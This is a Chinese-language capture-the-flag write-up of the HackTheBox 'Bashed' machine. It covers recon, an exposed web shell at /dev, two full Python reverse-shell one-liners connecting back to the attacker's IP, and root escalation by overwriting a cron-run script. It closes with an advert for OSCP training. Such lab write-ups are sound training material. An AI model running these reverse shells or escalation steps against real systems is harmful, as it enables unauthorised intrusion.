靶机信息

知识点

• 计划任务提权
• 反弹shell
• sudo -u 用户名 /bin/bash：以bash权限登录用户

一、信息收集

靶机ip：10.10.10.68

攻击机ip：10.10.16.26

nmap扫描

设置域名解析

echo'10.10.10.68 bashed.htb' | sudo tee -a /etc/hosts

dirsearch扫描目录

信息收集起来

/js/php/about.html/config.php/contact.html/css/dev/uploads

二、边界突破

访问80页面

访问**/dev**页面，执行命令的地方在最下面

发现两个bash用户

arrexelscriptmanager

查看是否有python

利用反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.26",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

监听

三、权限提升

拿到user.txt

查看权限

切换用户以**/bin/bash**权限

查看详细信息

这里因为是直接的py文件，所以直接放命令就好

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.16.26",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

从kali下载脚本替换test.py

监听等待

结束

end

oscp

有对红队工作感兴趣，或者有意报考oscp的师傅，可以考虑一下我们的培训课程，加我微信咨询，好处如下：

1.报考后课程随时可看，并且如果对考试没有信心，还可以留群跟第二批课程学习，不限次数时间，报考即是一辈子可看

2.200+台靶机及官方课程，lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍，并且群内随时答疑，团队老师及群友都会积极解答，全天可答疑

3.目前可接受分期付款，无利息，最多分四个月，第一次付完即可观看视频

4.加入课程可享受工作推荐机会，优秀者可内推至红队

5.报考即送送官方文档中文版，以及kali命令详解中文版，纯人工翻译，版权为团队所有

资料：

知识星球

还可以加入我们的知识星球，包含cs二开，甲壳虫，网恋避险工具，红盟工具等，还有很多src挖掘资料包

学习交流群

在公众号后台这里选择学习交流即可，如果图片二维码过期，可以加我微信获取